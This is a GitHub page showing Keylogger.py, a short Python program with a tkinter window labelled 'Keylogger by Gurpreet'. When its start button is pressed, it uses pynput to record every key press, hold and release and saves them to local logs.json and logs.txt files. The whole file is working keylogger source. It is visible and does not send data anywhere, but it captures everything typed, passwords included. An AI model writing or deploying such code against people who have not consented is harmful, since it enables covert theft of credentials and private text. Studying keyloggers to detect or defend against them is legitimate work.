-
Notifications
You must be signed in to change notification settings - Fork 0
/
Keylogger.py
80 lines (53 loc) · 1.79 KB
/
Keylogger.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
import tkinter as tk
from tkinter import *
from pynput import keyboard
import json
root = tk.Tk()
root.geometry("350x200")
root.title("Keylogger by Gurpreet")
key_list = []
x = False
key_strokes = ""
def update_txt_file(key):
with open ('logs.txt', 'w+') as key_stroke:
key_stroke.write(key)
def update_json_file(key_list):
with open('logs.json', '+wb') as key_log:
key_list_bytes = json.dumps(key_list).encode()
key_log.write(key_list_bytes)
def on_press(key):
global x, key_list
if x == False:
key_list.append(
{'Pressed':f'{key}'}
)
x = True
if x == True:
key_list.append(
{'Held':f'{key}'}
)
update_json_file(key_list)
def on_release(key):
global x, key_list, key_strokes
key_list.append(
{'Released':f'{key}'}
)
if x == True:
x = False
update_json_file(key_list)
key_strokes=key_strokes+str(key)
update_txt_file(str(key_strokes))
def butaction():
print("[+] Running Keylogger Successfully!\n [!] Saving the Key log in 'logs.json'")
with keyboard.Listener(
on_press=on_press,
on_release=on_release) as listener:
listener.join()
empty = Label(root, text=" ").grid(row=0,column=0)
empty = Label(root, text=" ").grid(row=1,column=0)
empty = Label(root, text=" ").grid(row=2,column=0)
empty = Label(root, text=" Keylogger by Gurpreet", font="Verdana 14 bold").grid(row=2,column=2)
empty = Label(root, text=" ").grid(row=4,column=0)
empty = Label(root, text=" ").grid(row=5,column=0)
Button(root, text="Start Keylogger", command=butaction, fg="white", bg="green").grid(row=5,column=2)
root.mainloop()